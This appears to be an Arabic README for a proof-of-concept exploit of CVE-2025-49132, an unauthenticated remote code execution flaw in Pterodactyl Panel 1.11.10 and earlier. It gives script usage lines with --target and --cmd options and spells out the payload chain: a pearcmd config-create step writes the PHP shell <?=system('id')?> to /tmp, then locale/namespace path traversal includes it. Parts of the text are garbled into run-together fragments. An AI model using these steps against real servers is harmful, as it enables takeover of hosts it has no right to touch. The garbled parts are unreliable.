
PoC exploit لـ CVE-2025-49132 (GHSA-24wv-6c99-f843) – تنفيذ تعليمات برمجية عن بُعد بدون مصادقة في Pterodactyl Panel ≤ 1.11.10
Pterodactyl Panel - تنفيذ كود عن بعد غير مصادق عليه (RCE)
CVE‑2025‑49132 هي ثغرة تنفيذ كود عن بعد حرجة تؤثر على Pterodactyl Panel <= 1.11.10.
يمكن لمهاجم غير مصادق استغلال التحقق غير السليم من المدخلات في نقطة النهاية /locales/locale.json لتنفيذ أوامر نظام عشوائية.
تم التصحيح في الإصدار: 1.11.11
يسمح الاستغلال الناجح بـ:
.env)الخطورة: حرجة
توجد الثغرة بسبب التحقق غير السليم من:
locale parameternamespace parameterيمكن للمهاجم:
../../../../../)config-create/tmpتصنيف الضعف: CWE-94 -- التحكم غير السليم في توليد الكود
python3 CVE-2025-49132-dbs.py --target <host> --cmd "<command>" [--path <pear_path>]
python3 CVE-2025-49132-dbs.py --target victim.com --cmd "whoami"
python3 CVE-2025-49132-dbs.py --target 192.168.1.10 --cmd "id" --path /usr/local/lib/php/PEAR
المسار الافتراضي:
/usr/share/php/PEAR
احصل على المسار الصحيح من صفحة /phpinfo.php

يقوم المهاجم بحقن حمولة PHP خبيثة في /tmp/payload.php باستخدام:
/<?=system('id')?>+/tmp/payload.php
من خلال استدعاء:
?locale=../../../../../tmp&namespace=payload
يقوم الخادم بتنفيذ PHP المحقون.

locale و namespace